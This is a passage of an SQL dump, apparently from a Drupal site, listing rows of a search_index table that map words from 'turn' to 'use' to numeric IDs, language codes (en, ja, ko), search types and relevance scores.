('turn', 9, 'ja', 'help_search', 3),
('turn', 9, 'ko', 'help_search', 3),
('turn', 37, 'en', 'help_search', 0.854391),
('turn', 37, 'ja', 'help_search', 0.854391),
('turn', 37, 'ko', 'help_search', 0.854391),
('turning', 33, 'en', 'help_search', 2),
('turning', 33, 'ja', 'help_search', 2),
('turning', 33, 'ko', 'help_search', 2),
('turning', 199, 'en', 'node_search', 27),
('turns', 28, 'en', 'help_search', 1),
('turns', 28, 'ja', 'help_search', 1),
('turns', 28, 'ko', 'help_search', 1),
('twice', 82, 'en', 'help_search', 1),
('twice', 82, 'ja', 'help_search', 1),
('twice', 82, 'ko', 'help_search', 1),
('twig', 46, 'en', 'help_search', 1),
('twig', 46, 'ja', 'help_search', 1),
('twig', 46, 'ko', 'help_search', 1),
('twigfilebased', 46, 'en', 'help_search', 1),
('twigfilebased', 46, 'ja', 'help_search', 1),
('twigfilebased', 46, 'ko', 'help_search', 1),
('two', 6, 'en', 'help_search', 1),
('two', 6, 'ja', 'help_search', 1),
('two', 6, 'ko', 'help_search', 1),
('two', 20, 'en', 'help_search', 1),
('two', 20, 'ja', 'help_search', 1),
('two', 20, 'ko', 'help_search', 1),
('two', 27, 'en', 'help_search', 1),
('two', 27, 'en', 'node_search', 2.39936),
('two', 27, 'ja', 'help_search', 1),
('two', 27, 'ko', 'help_search', 1),
('two', 34, 'en', 'help_search', 1),
('two', 34, 'ja', 'help_search', 1),
('two', 34, 'ko', 'help_search', 1),
('two', 44, 'en', 'help_search', 1),
('two', 44, 'ja', 'help_search', 1),
('two', 44, 'ko', 'help_search', 1),
('two', 48, 'en', 'help_search', 1),
('two', 48, 'ja', 'help_search', 1),
('two', 48, 'ko', 'help_search', 1),
('two', 68, 'en', 'help_search', 1),
('two', 68, 'en', 'node_search', 1),
('two', 68, 'ja', 'help_search', 1),
('two', 68, 'ja', 'node_search', 1),
('two', 68, 'ko', 'help_search', 1),
('two', 80, 'en', 'help_search', 1),
('two', 80, 'en', 'node_search', 4),
('two', 80, 'ja', 'help_search', 1),
('two', 80, 'ko', 'help_search', 1),
('two', 91, 'en', 'help_search', 1),
('two', 91, 'ja', 'help_search', 1),
('two', 91, 'ko', 'help_search', 1),
('two', 92, 'en', 'help_search', 1),
('two', 92, 'ja', 'help_search', 1),
('two', 92, 'ko', 'help_search', 1),
('two', 162, 'en', 'node_search', 0.949597),
('two', 176, 'en', 'node_search', 29),
('two', 184, 'en', 'node_search', 27),
('type', 2, 'en', 'help_search', 1),
('type', 2, 'ja', 'help_search', 1),
('type', 2, 'ko', 'help_search', 1),
('type', 4, 'en', 'help_search', 2),
('type', 4, 'ja', 'help_search', 2),
('type', 4, 'ko', 'help_search', 2),
('type', 5, 'en', 'help_search', 35),
('type', 5, 'ja', 'help_search', 35),
('type', 5, 'ko', 'help_search', 35),
('type', 7, 'en', 'help_search', 12.9097),
('type', 7, 'ja', 'help_search', 12.9097),
('type', 7, 'ko', 'help_search', 12.9097),
('type', 8, 'en', 'help_search', 58),
('type', 8, 'ja', 'help_search', 58),
('type', 8, 'ko', 'help_search', 58),
('type', 9, 'en', 'help_search', 1),
('type', 9, 'ja', 'help_search', 1),
('type', 9, 'ko', 'help_search', 1),
('type', 11, 'en', 'help_search', 26),
('type', 11, 'ja', 'help_search', 26),
('type', 11, 'ko', 'help_search', 26),
('type', 13, 'en', 'help_search', 4),
('type', 13, 'ja', 'help_search', 4),
('type', 13, 'ko', 'help_search', 4),
('type', 15, 'en', 'help_search', 4),
('type', 15, 'ja', 'help_search', 4),
('type', 15, 'ko', 'help_search', 4),
('type', 16, 'en', 'help_search', 1),
('type', 16, 'ja', 'help_search', 1),
('type', 16, 'ko', 'help_search', 1),
('type', 24, 'en', 'help_search', 3),
('type', 24, 'ja', 'help_search', 3),
('type', 24, 'ko', 'help_search', 3),
('type', 25, 'en', 'help_search', 2),
('type', 25, 'ja', 'help_search', 2),
('type', 26, 'en', 'help_search', 2),
('type', 26, 'ja', 'help_search', 2),
('type', 26, 'ko', 'help_search', 2),
('type', 27, 'en', 'help_search', 16),
('type', 27, 'ja', 'help_search', 16),
('type', 27, 'ko', 'help_search', 16),
('type', 28, 'en', 'help_search', 1),
('type', 28, 'ja', 'help_search', 1),
('type', 28, 'ko', 'help_search', 1),
('type', 30, 'en', 'help_search', 2),
('type', 30, 'ja', 'help_search', 2),
('type', 30, 'ko', 'help_search', 2),
('type', 31, 'ja', 'help_search', 13.0673),
('type', 36, 'en', 'help_search', 1),
('type', 36, 'ja', 'help_search', 1),
('type', 36, 'ko', 'help_search', 1),
('type', 45, 'en', 'help_search', 1),
('type', 45, 'ja', 'help_search', 1),
('type', 45, 'ko', 'help_search', 1),
('type', 54, 'en', 'help_search', 39),
('type', 54, 'ja', 'help_search', 39),
('type', 54, 'ko', 'help_search', 39),
('type', 55, 'en', 'help_search', 30),
('type', 55, 'ja', 'help_search', 30),
('type', 55, 'ko', 'help_search', 30),
('type', 56, 'en', 'help_search', 1),
('type', 56, 'ja', 'help_search', 1),
('type', 56, 'ko', 'help_search', 1),
('type', 59, 'en', 'help_search', 5),
('type', 59, 'ja', 'help_search', 5),
('type', 59, 'ko', 'help_search', 5),
('type', 60, 'en', 'help_search', 66),
('type', 60, 'ja', 'help_search', 66),
('type', 60, 'ko', 'help_search', 66),
('type', 61, 'en', 'help_search', 6),
('type', 61, 'ja', 'help_search', 6),
('type', 61, 'ko', 'help_search', 6),
('type', 62, 'en', 'help_search', 24),
('type', 62, 'ja', 'help_search', 24),
('type', 62, 'ko', 'help_search', 24),
('type', 66, 'en', 'help_search', 4),
('type', 66, 'ja', 'help_search', 4),
('type', 68, 'en', 'help_search', 2),
('type', 68, 'ja', 'help_search', 2),
('type', 68, 'ko', 'help_search', 2),
('type', 79, 'en', 'help_search', 1),
('type', 79, 'ja', 'help_search', 1),
('type', 79, 'ko', 'help_search', 1),
('type', 80, 'en', 'help_search', 1),
('type', 80, 'ja', 'help_search', 1),
('type', 80, 'ko', 'help_search', 1),
('type', 84, 'en', 'help_search', 1),
('type', 84, 'ja', 'help_search', 1),
('type', 84, 'ko', 'help_search', 1),
('type', 88, 'en', 'help_search', 1),
('type', 88, 'ja', 'help_search', 1),
('type', 88, 'ko', 'help_search', 1),
('type', 90, 'en', 'help_search', 1),
('type', 90, 'ja', 'help_search', 1),
('type', 90, 'ko', 'help_search', 1),
('type', 91, 'en', 'help_search', 1),
('type', 91, 'ja', 'help_search', 1),
('type', 91, 'ko', 'help_search', 1),
('type', 92, 'en', 'help_search', 7),
('type', 92, 'ja', 'help_search', 7),
('type', 92, 'ko', 'help_search', 7),
('type', 93, 'en', 'help_search', 4.8249),
('type', 93, 'ja', 'help_search', 4.8249),
('type', 93, 'ko', 'help_search', 4.8249),
('type', 204, 'en', 'node_search', 4),
('type', 204, 'ja', 'node_search', 4),
('types', 2, 'en', 'help_search', 5),
('types', 2, 'ja', 'help_search', 5),
('types', 2, 'ko', 'help_search', 5),
('types', 5, 'en', 'help_search', 8),
('types', 5, 'ja', 'help_search', 8),
('types', 5, 'ko', 'help_search', 8),
('types', 6, 'en', 'help_search', 1),
('types', 6, 'ja', 'help_search', 1),
('types', 6, 'ko', 'help_search', 1),
('types', 7, 'en', 'help_search', 4),
('types', 7, 'ja', 'help_search', 4),
('types', 7, 'ko', 'help_search', 4),
('types', 8, 'en', 'help_search', 10),
('types', 8, 'ja', 'help_search', 10),
('types', 8, 'ko', 'help_search', 10),
('types', 11, 'en', 'help_search', 6.77882),
('types', 11, 'ja', 'help_search', 6.77882),
('types', 11, 'ko', 'help_search', 6.77882),
('types', 16, 'en', 'help_search', 1),
('types', 16, 'ja', 'help_search', 1),
('types', 16, 'ko', 'help_search', 1),
('types', 20, 'en', 'help_search', 1),
('types', 20, 'ja', 'help_search', 1),
('types', 20, 'ko', 'help_search', 1),
('types', 23, 'en', 'node_search', 1),
('types', 24, 'en', 'help_search', 7),
('types', 24, 'ja', 'help_search', 7),
('types', 24, 'ko', 'help_search', 7),
('types', 25, 'en', 'help_search', 4),
('types', 25, 'ja', 'help_search', 4),
('types', 26, 'en', 'help_search', 4),
('types', 26, 'ja', 'help_search', 4),
('types', 26, 'ko', 'help_search', 4),
('types', 27, 'en', 'help_search', 5),
('types', 27, 'ja', 'help_search', 5),
('types', 27, 'ko', 'help_search', 5),
('types', 30, 'en', 'help_search', 8.39477),
('types', 30, 'ja', 'help_search', 8.39477),
('types', 30, 'ko', 'help_search', 8.39477),
('types', 31, 'ja', 'help_search', 88.542),
('types', 35, 'en', 'help_search', 4),
('types', 35, 'ja', 'help_search', 4),
('types', 35, 'ko', 'help_search', 4),
('types', 41, 'en', 'help_search', 1),
('types', 41, 'ja', 'help_search', 1),
('types', 41, 'ko', 'help_search', 1),
('types', 43, 'en', 'help_search', 0.980874),
('types', 43, 'ja', 'help_search', 0.980874),
('types', 43, 'ko', 'help_search', 0.980874),
('types', 50, 'en', 'help_search', 1),
('types', 50, 'ja', 'help_search', 1),
('types', 50, 'ko', 'help_search', 1),
('types', 54, 'en', 'help_search', 4),
('types', 54, 'ja', 'help_search', 4),
('types', 54, 'ko', 'help_search', 4),
('types', 55, 'en', 'help_search', 1),
('types', 55, 'ja', 'help_search', 1),
('types', 55, 'ko', 'help_search', 1),
('types', 59, 'en', 'help_search', 2),
('types', 59, 'ja', 'help_search', 2),
('types', 59, 'ko', 'help_search', 2),
('types', 60, 'en', 'help_search', 10),
('types', 60, 'ja', 'help_search', 10),
('types', 60, 'ko', 'help_search', 10),
('types', 61, 'en', 'help_search', 3),
('types', 61, 'ja', 'help_search', 3),
('types', 61, 'ko', 'help_search', 3),
('types', 62, 'en', 'help_search', 7),
('types', 62, 'ja', 'help_search', 7),
('types', 62, 'ko', 'help_search', 7),
('types', 67, 'en', 'help_search', 1),
('types', 67, 'ja', 'help_search', 1),
('types', 67, 'ko', 'help_search', 1),
('types', 68, 'en', 'help_search', 3),
('types', 68, 'ja', 'help_search', 3),
('types', 68, 'ko', 'help_search', 3),
('types', 88, 'en', 'help_search', 1),
('types', 88, 'ja', 'help_search', 1),
('types', 88, 'ko', 'help_search', 1),
('types', 92, 'en', 'help_search', 2),
('types', 92, 'ja', 'help_search', 2),
('types', 92, 'ko', 'help_search', 2),
('types', 93, 'en', 'help_search', 1),
('types', 93, 'ja', 'help_search', 1),
('types', 93, 'ko', 'help_search', 1),
('typically', 8, 'en', 'help_search', 1),
('typically', 8, 'ja', 'help_search', 1),
('typically', 8, 'ko', 'help_search', 1),
('typically', 10, 'en', 'help_search', 1),
('typically', 10, 'ja', 'help_search', 1),
('typically', 10, 'ko', 'help_search', 1),
('typically', 11, 'en', 'help_search', 1),
('typically', 11, 'ja', 'help_search', 1),
('typically', 11, 'ko', 'help_search', 1),
('typically', 23, 'en', 'help_search', 1),
('typically', 23, 'ja', 'help_search', 1),
('typically', 23, 'ko', 'help_search', 1),
('typically', 44, 'en', 'help_search', 1),
('typically', 44, 'ja', 'help_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('typically', 44, 'ko', 'help_search', 1),
('typically', 60, 'en', 'help_search', 1),
('typically', 60, 'ja', 'help_search', 1),
('typically', 60, 'ko', 'help_search', 1),
('typing', 56, 'en', 'help_search', 1),
('typing', 56, 'ja', 'help_search', 1),
('typing', 56, 'ko', 'help_search', 1),
('ultimate', 98, 'en', 'node_search', 1),
('unapproved', 10, 'en', 'help_search', 4),
('unapproved', 10, 'ja', 'help_search', 4),
('unapproved', 10, 'ko', 'help_search', 4),
('uncacheable', 37, 'en', 'help_search', 0.923838),
('uncacheable', 37, 'ja', 'help_search', 0.923838),
('uncacheable', 37, 'ko', 'help_search', 0.923838),
('uncheck', 18, 'en', 'help_search', 1),
('uncheck', 18, 'ja', 'help_search', 1),
('uncheck', 18, 'ko', 'help_search', 1),
('uncheck', 50, 'en', 'help_search', 1),
('uncheck', 50, 'ja', 'help_search', 1),
('uncheck', 50, 'ko', 'help_search', 1),
('uncheck', 58, 'en', 'help_search', 1),
('uncheck', 58, 'ja', 'help_search', 1),
('uncheck', 58, 'ko', 'help_search', 1),
('uncheck', 59, 'en', 'help_search', 1),
('uncheck', 59, 'ja', 'help_search', 1),
('uncheck', 59, 'ko', 'help_search', 1),
('uncheck', 73, 'en', 'help_search', 1),
('uncheck', 73, 'ja', 'help_search', 1),
('uncheck', 73, 'ko', 'help_search', 1),
('uncheck', 85, 'en', 'help_search', 1),
('uncheck', 85, 'ja', 'help_search', 1),
('uncheck', 85, 'ko', 'help_search', 1),
('uncheck', 86, 'en', 'help_search', 1),
('uncheck', 86, 'ja', 'help_search', 1),
('uncheck', 86, 'ko', 'help_search', 1),
('under', 9, 'en', 'help_search', 1),
('under', 9, 'ja', 'help_search', 1),
('under', 9, 'ko', 'help_search', 1),
('under', 16, 'en', 'help_search', 2),
('under', 16, 'ja', 'help_search', 2),
('under', 16, 'ko', 'help_search', 2),
('under', 18, 'en', 'node_search', 1),
('under', 18, 'ko', 'node_search', 1),
('under', 23, 'en', 'help_search', 0.949597),
('under', 23, 'ja', 'help_search', 0.949597),
('under', 23, 'ko', 'help_search', 0.949597),
('under', 24, 'en', 'node_search', 1),
('under', 28, 'en', 'help_search', 2.48477),
('under', 28, 'ja', 'help_search', 2.48477),
('under', 28, 'ko', 'help_search', 2.48477),
('under', 45, 'en', 'help_search', 1),
('under', 45, 'ja', 'help_search', 1),
('under', 45, 'ko', 'help_search', 1),
('under', 46, 'en', 'help_search', 1),
('under', 46, 'ja', 'help_search', 1),
('under', 46, 'ko', 'help_search', 1),
('under', 48, 'en', 'help_search', 1),
('under', 48, 'ja', 'help_search', 1),
('under', 48, 'ko', 'help_search', 1),
('under', 54, 'en', 'help_search', 2),
('under', 54, 'ja', 'help_search', 2),
('under', 54, 'ko', 'help_search', 2),
('under', 55, 'en', 'help_search', 2),
('under', 55, 'ja', 'help_search', 2),
('under', 55, 'ko', 'help_search', 2),
('under', 61, 'en', 'help_search', 0.980874),
('under', 61, 'ja', 'help_search', 0.980874),
('under', 61, 'ko', 'help_search', 0.980874),
('under', 63, 'en', 'help_search', 1),
('under', 63, 'ja', 'help_search', 1),
('under', 63, 'ko', 'help_search', 1),
('under', 67, 'en', 'help_search', 3.86775),
('under', 67, 'ja', 'help_search', 3.86775),
('under', 67, 'ko', 'help_search', 3.86775),
('under', 72, 'en', 'help_search', 1.92027),
('under', 72, 'ja', 'help_search', 1.92027),
('under', 72, 'ko', 'help_search', 1.92027),
('under', 80, 'en', 'help_search', 1),
('under', 80, 'ja', 'help_search', 1),
('under', 80, 'ko', 'help_search', 1),
('under', 88, 'en', 'help_search', 1),
('under', 88, 'ja', 'help_search', 1),
('under', 88, 'ko', 'help_search', 1),
('under', 91, 'en', 'help_search', 1),
('under', 91, 'ja', 'help_search', 1),
('under', 91, 'ko', 'help_search', 1),
('under', 92, 'en', 'help_search', 1),
('under', 92, 'ja', 'help_search', 1),
('under', 92, 'ko', 'help_search', 1),
('under', 116, 'en', 'node_search', 1),
('under', 154, 'en', 'node_search', 29),
('under', 156, 'en', 'node_search', 2),
('under', 157, 'en', 'node_search', 2),
('under', 164, 'en', 'node_search', 2),
('under', 165, 'en', 'node_search', 2),
('under', 167, 'en', 'node_search', 2),
('under', 169, 'en', 'node_search', 5),
('under', 171, 'en', 'node_search', 5),
('under', 173, 'en', 'node_search', 5),
('under', 174, 'en', 'node_search', 2),
('under', 175, 'en', 'node_search', 2),
('under', 176, 'en', 'node_search', 2),
('under', 177, 'en', 'node_search', 2),
('under', 184, 'en', 'node_search', 2),
('undergo', 136, 'en', 'node_search', 1),
('underlying', 37, 'en', 'help_search', 1),
('underlying', 37, 'ja', 'help_search', 1),
('underlying', 37, 'ko', 'help_search', 1),
('understand', 3, 'en', 'node_search', 0.972861),
('understand', 3, 'ko', 'node_search', 0.96498),
('understand', 5, 'en', 'node_search', 1),
('understand', 5, 'ko', 'node_search', 1),
('understand', 42, 'en', 'help_search', 2),
('understand', 42, 'ja', 'help_search', 2),
('understand', 42, 'ko', 'help_search', 2),
('understand', 77, 'en', 'node_search', 4),
('understand', 87, 'en', 'node_search', 1),
('understandable', 65, 'en', 'help_search', 1),
('understandable', 65, 'ja', 'help_search', 1),
('understandable', 65, 'ko', 'help_search', 1),
('understanding', 30, 'en', 'node_search', 2),
('understanding', 122, 'en', 'node_search', 1),
('unformatted', 91, 'en', 'help_search', 8),
('unformatted', 91, 'ja', 'help_search', 8),
('unformatted', 91, 'ko', 'help_search', 8),
('uniform', 65, 'en', 'help_search', 1),
('uniform', 65, 'ja', 'help_search', 1),
('uniform', 65, 'ko', 'help_search', 1),
('uniform', 155, 'en', 'node_search', 1),
('uninstall', 32, 'en', 'help_search', 1),
('uninstall', 32, 'ja', 'help_search', 1),
('uninstall', 32, 'ko', 'help_search', 1),
('uninstall', 33, 'en', 'help_search', 1),
('uninstall', 33, 'ja', 'help_search', 1),
('uninstall', 33, 'ko', 'help_search', 1),
('uninstall', 43, 'en', 'help_search', 0.931053),
('uninstall', 43, 'ja', 'help_search', 0.931053),
('uninstall', 43, 'ko', 'help_search', 0.931053),
('uninstall', 75, 'en', 'help_search', 24),
('uninstall', 75, 'ja', 'help_search', 24),
('uninstall', 75, 'ko', 'help_search', 24),
('uninstall', 78, 'en', 'help_search', 11),
('uninstall', 78, 'ja', 'help_search', 11),
('uninstall', 78, 'ko', 'help_search', 11),
('uninstalled', 33, 'en', 'help_search', 1),
('uninstalled', 33, 'ja', 'help_search', 1),
('uninstalled', 33, 'ko', 'help_search', 1),
('uninstalled', 75, 'en', 'help_search', 5),
('uninstalled', 75, 'ja', 'help_search', 5),
('uninstalled', 75, 'ko', 'help_search', 5),
('uninstalled', 77, 'en', 'help_search', 4),
('uninstalled', 77, 'ja', 'help_search', 4),
('uninstalled', 77, 'ko', 'help_search', 4),
('uninstalled', 78, 'en', 'help_search', 1),
('uninstalled', 78, 'ja', 'help_search', 1),
('uninstalled', 78, 'ko', 'help_search', 1),
('uninstalling', 33, 'en', 'help_search', 20),
('uninstalling', 33, 'ja', 'help_search', 20),
('uninstalling', 33, 'ko', 'help_search', 20),
('uninstalling', 34, 'en', 'help_search', 1),
('uninstalling', 34, 'ja', 'help_search', 1),
('uninstalling', 34, 'ko', 'help_search', 1),
('uninstalling', 75, 'en', 'help_search', 26),
('uninstalling', 75, 'ja', 'help_search', 26),
('uninstalling', 75, 'ko', 'help_search', 26),
('uninstalling', 78, 'en', 'help_search', 26),
('uninstalling', 78, 'ja', 'help_search', 26),
('uninstalling', 78, 'ko', 'help_search', 26),
('unique', 30, 'en', 'help_search', 1.89272),
('unique', 30, 'ja', 'help_search', 1.89272),
('unique', 30, 'ko', 'help_search', 1.89272),
('unique', 32, 'en', 'help_search', 1),
('unique', 32, 'ja', 'help_search', 1),
('unique', 32, 'ko', 'help_search', 1),
('unique', 65, 'en', 'help_search', 1),
('unique', 65, 'ja', 'help_search', 1),
('unique', 65, 'ko', 'help_search', 1),
('university', 18, 'en', 'node_search', 1),
('university', 18, 'ko', 'node_search', 1),
('university', 27, 'en', 'node_search', 1),
('university', 62, 'en', 'node_search', 1),
('unlike', 162, 'en', 'node_search', 1),
('unlimited', 24, 'en', 'help_search', 1),
('unlimited', 24, 'ja', 'help_search', 1),
('unlimited', 24, 'ko', 'help_search', 1),
('unlimited', 27, 'en', 'help_search', 1),
('unlimited', 27, 'ja', 'help_search', 1),
('unlimited', 27, 'ko', 'help_search', 1),
('unlock', 62, 'en', 'node_search', 0.833529),
('unpacked', 14, 'en', 'help_search', 1),
('unpacked', 14, 'ja', 'help_search', 1),
('unpacked', 14, 'ko', 'help_search', 1),
('unparalleled', 62, 'en', 'node_search', 1),
('unpublish', 10, 'en', 'help_search', 5),
('unpublish', 10, 'ja', 'help_search', 5),
('unpublish', 10, 'ko', 'help_search', 5),
('unpublished', 11, 'en', 'help_search', 1),
('unpublished', 11, 'ja', 'help_search', 1),
('unpublished', 11, 'ko', 'help_search', 1),
('unpublished', 59, 'en', 'help_search', 2),
('unpublished', 59, 'ja', 'help_search', 2),
('unpublished', 59, 'ko', 'help_search', 2),
('unpublished', 61, 'en', 'help_search', 1),
('unpublished', 61, 'ja', 'help_search', 1),
('unpublished', 61, 'ko', 'help_search', 1),
('unpublishing', 93, 'en', 'help_search', 0.819249),
('unpublishing', 93, 'ja', 'help_search', 0.819249),
('unpublishing', 93, 'ko', 'help_search', 0.819249),
('until', 11, 'en', 'help_search', 1),
('until', 11, 'ja', 'help_search', 1),
('until', 11, 'ko', 'help_search', 1),
('until', 22, 'en', 'help_search', 1),
('until', 22, 'ja', 'help_search', 1),
('until', 22, 'ko', 'help_search', 1),
('until', 45, 'en', 'help_search', 1),
('until', 45, 'ja', 'help_search', 1),
('until', 45, 'ko', 'help_search', 1),
('until', 48, 'en', 'help_search', 1),
('until', 48, 'ja', 'help_search', 1),
('until', 48, 'ko', 'help_search', 1),
('until', 52, 'en', 'help_search', 1),
('until', 52, 'ja', 'help_search', 1),
('until', 52, 'ko', 'help_search', 1),
('until', 56, 'en', 'help_search', 1),
('until', 56, 'ja', 'help_search', 1),
('until', 56, 'ko', 'help_search', 1),
('until', 69, 'en', 'help_search', 1),
('until', 69, 'ja', 'help_search', 1),
('until', 69, 'ko', 'help_search', 1),
('until', 71, 'en', 'help_search', 1),
('until', 71, 'ja', 'help_search', 1),
('until', 71, 'ko', 'help_search', 1),
('until', 87, 'en', 'help_search', 1),
('until', 87, 'ja', 'help_search', 1),
('until', 87, 'ko', 'help_search', 1),
('untrusted', 11, 'en', 'help_search', 0.953396),
('untrusted', 11, 'ja', 'help_search', 0.953396),
('untrusted', 11, 'ko', 'help_search', 0.953396),
('untrusted', 28, 'en', 'help_search', 0.882818),
('untrusted', 28, 'ja', 'help_search', 0.882818),
('untrusted', 28, 'ko', 'help_search', 0.882818),
('unused', 78, 'en', 'help_search', 26),
('unused', 78, 'ja', 'help_search', 26),
('unused', 78, 'ko', 'help_search', 26),
('unwanted', 10, 'en', 'help_search', 1),
('unwanted', 10, 'ja', 'help_search', 1),
('unwanted', 10, 'ko', 'help_search', 1),
('unwavering', 120, 'en', 'node_search', 4),
('upcoming', 76, 'en', 'help_search', 1),
('upcoming', 76, 'ja', 'help_search', 1),
('upcoming', 76, 'ko', 'help_search', 1),
('upcoming', 160, 'en', 'node_search', 1),
('upcoming', 161, 'en', 'node_search', 1),
('upcoming', 166, 'en', 'node_search', 1),
('upcoming', 168, 'en', 'node_search', 1),
('upcoming', 170, 'en', 'node_search', 1),
('upcoming', 179, 'en', 'node_search', 1),
('upcoming', 188, 'en', 'node_search', 1),
('upcoming', 190, 'en', 'node_search', 1),
('upcoming', 192, 'en', 'node_search', 1),
('upcoming', 194, 'en', 'node_search', 1),
('update', 1, 'en', 'help_search', 1),
('update', 1, 'ja', 'help_search', 1),
('update', 1, 'ko', 'help_search', 1),
('update', 38, 'en', 'help_search', 4),
('update', 38, 'ja', 'help_search', 4),
('update', 38, 'ko', 'help_search', 4),
('update', 41, 'en', 'help_search', 1),
('update', 41, 'ja', 'help_search', 1),
('update', 41, 'ko', 'help_search', 1),
('update', 43, 'en', 'help_search', 1.87314),
('update', 43, 'ja', 'help_search', 1.87314),
('update', 43, 'ko', 'help_search', 1.87314),
('update', 49, 'en', 'help_search', 1),
('update', 49, 'ja', 'help_search', 1),
('update', 49, 'ko', 'help_search', 1),
('update', 50, 'en', 'help_search', 0.957226),
('update', 50, 'ja', 'help_search', 0.957226),
('update', 50, 'ko', 'help_search', 0.957226),
('update', 53, 'en', 'help_search', 2),
('update', 53, 'ja', 'help_search', 2),
('update', 53, 'ko', 'help_search', 2),
('update', 61, 'en', 'help_search', 2),
('update', 61, 'ja', 'help_search', 2),
('update', 61, 'ko', 'help_search', 2),
('update', 76, 'en', 'help_search', 4),
('update', 76, 'ja', 'help_search', 4),
('update', 76, 'ko', 'help_search', 4),
('update', 87, 'en', 'help_search', 3),
('update', 87, 'ja', 'help_search', 3),
('update', 87, 'ko', 'help_search', 3),
('update', 89, 'en', 'help_search', 1),
('update', 89, 'ja', 'help_search', 1),
('update', 89, 'ko', 'help_search', 1),
('update', 91, 'en', 'help_search', 4),
('update', 91, 'ja', 'help_search', 4),
('update', 91, 'ko', 'help_search', 4),
('updated', 32, 'en', 'help_search', 1),
('updated', 32, 'ja', 'help_search', 1),
('updated', 32, 'ko', 'help_search', 1),
('updated', 45, 'en', 'help_search', 1),
('updated', 45, 'ja', 'help_search', 1),
('updated', 45, 'ko', 'help_search', 1),
('updated', 46, 'en', 'help_search', 2),
('updated', 46, 'ja', 'help_search', 2),
('updated', 46, 'ko', 'help_search', 2),
('updated', 47, 'en', 'help_search', 9),
('updated', 47, 'ja', 'help_search', 9),
('updated', 47, 'ko', 'help_search', 9),
('updated', 49, 'en', 'help_search', 1),
('updated', 49, 'ja', 'help_search', 1),
('updated', 49, 'ko', 'help_search', 1),
('updated', 66, 'en', 'help_search', 1),
('updated', 66, 'ja', 'help_search', 1),
('updates', 30, 'en', 'help_search', 1.92384),
('updates', 30, 'ja', 'help_search', 1.92384),
('updates', 30, 'ko', 'help_search', 1.92384),
('updates', 38, 'en', 'help_search', 21),
('updates', 38, 'ja', 'help_search', 21),
('updates', 38, 'ko', 'help_search', 21),
('updates', 43, 'en', 'help_search', 0.892724),
('updates', 43, 'ja', 'help_search', 0.892724),
('updates', 43, 'ko', 'help_search', 0.892724),
('updates', 53, 'en', 'help_search', 6),
('updates', 53, 'ja', 'help_search', 6),
('updates', 53, 'ko', 'help_search', 6),
('updates', 76, 'en', 'help_search', 6),
('updates', 76, 'ja', 'help_search', 6),
('updates', 76, 'ko', 'help_search', 6),
('updating', 30, 'en', 'help_search', 1.47793),
('updating', 30, 'ja', 'help_search', 1.47793),
('updating', 30, 'ko', 'help_search', 1.47793),
('updating', 34, 'en', 'help_search', 1),
('updating', 34, 'ja', 'help_search', 1),
('updating', 34, 'ko', 'help_search', 1),
('updating', 38, 'en', 'help_search', 2),
('updating', 38, 'ja', 'help_search', 2),
('updating', 38, 'ko', 'help_search', 2),
('upload', 14, 'en', 'help_search', 4),
('upload', 14, 'ja', 'help_search', 4),
('upload', 14, 'ko', 'help_search', 4),
('uploaded', 14, 'en', 'help_search', 1),
('uploaded', 14, 'ja', 'help_search', 1),
('uploaded', 14, 'ko', 'help_search', 1),
('uploaded', 29, 'en', 'help_search', 1),
('uploaded', 29, 'ja', 'help_search', 1),
('uploaded', 29, 'ko', 'help_search', 1),
('upon', 31, 'en', 'node_search', 0.902857),
('upon', 62, 'en', 'node_search', 1),
('upon', 135, 'en', 'node_search', 1),
('upper', 11, 'en', 'node_search', 1),
('upper', 11, 'ja', 'node_search', 1),
('upper', 22, 'en', 'help_search', 2),
('upper', 22, 'ja', 'help_search', 2),
('upper', 22, 'ko', 'help_search', 2),
('urgently', 30, 'en', 'node_search', 28),
('url', 20, 'en', 'help_search', 1),
('url', 20, 'ja', 'help_search', 1),
('url', 20, 'ko', 'help_search', 1),
('url', 32, 'en', 'help_search', 6),
('url', 32, 'ja', 'help_search', 6),
('url', 32, 'ko', 'help_search', 6),
('url', 35, 'en', 'help_search', 1),
('url', 35, 'ja', 'help_search', 1),
('url', 35, 'ko', 'help_search', 1),
('url', 50, 'en', 'help_search', 3),
('url', 50, 'ja', 'help_search', 3),
('url', 50, 'ko', 'help_search', 3),
('url', 56, 'en', 'help_search', 1),
('url', 56, 'ja', 'help_search', 1),
('url', 56, 'ko', 'help_search', 1),
('url', 63, 'en', 'help_search', 54),
('url', 63, 'ja', 'help_search', 54),
('url', 63, 'ko', 'help_search', 54),
('url', 64, 'en', 'help_search', 55),
('url', 64, 'ja', 'help_search', 55),
('url', 64, 'ko', 'help_search', 55),
('url', 65, 'en', 'help_search', 25),
('url', 65, 'ja', 'help_search', 25),
('url', 65, 'ko', 'help_search', 25),
('url', 66, 'en', 'help_search', 1),
('url', 66, 'ja', 'help_search', 1),
('url', 68, 'en', 'help_search', 1),
('url', 68, 'ja', 'help_search', 1),
('url', 68, 'ko', 'help_search', 1),
('url', 72, 'en', 'help_search', 2.97395),
('url', 72, 'ja', 'help_search', 2.97395),
('url', 72, 'ko', 'help_search', 2.97395),
('url', 86, 'en', 'help_search', 4),
('url', 86, 'ja', 'help_search', 4),
('url', 86, 'ko', 'help_search', 4),
('url', 93, 'en', 'help_search', 1),
('url', 93, 'ja', 'help_search', 1),
('url', 93, 'ko', 'help_search', 1),
('urls', 28, 'en', 'help_search', 3.99731),
('urls', 28, 'ja', 'help_search', 3.99731),
('urls', 28, 'ko', 'help_search', 3.99731),
('urls', 63, 'en', 'help_search', 1),
('urls', 63, 'ja', 'help_search', 1),
('urls', 63, 'ko', 'help_search', 1),
('urls', 64, 'en', 'help_search', 1),
('urls', 64, 'ja', 'help_search', 1),
('urls', 64, 'ko', 'help_search', 1),
('urls', 65, 'en', 'help_search', 58),
('urls', 65, 'ja', 'help_search', 58),
('urls', 65, 'ko', 'help_search', 58),
('urls', 72, 'en', 'help_search', 1),
('urls', 72, 'ja', 'help_search', 1),
('urls', 72, 'ko', 'help_search', 1),
('use', 6, 'en', 'help_search', 1.96109),
('use', 6, 'ja', 'help_search', 1.96109),
('use', 6, 'ko', 'help_search', 1.96109),
('use', 7, 'en', 'help_search', 1),
('use', 7, 'ja', 'help_search', 1),
('use', 7, 'ko', 'help_search', 1),
('use', 13, 'en', 'help_search', 1),
('use', 13, 'ja', 'help_search', 1),
('use', 13, 'ko', 'help_search', 1),
('use', 17, 'en', 'help_search', 1),
('use', 17, 'ja', 'help_search', 1),
('use', 17, 'ko', 'help_search', 1),
('use', 18, 'en', 'help_search', 6),
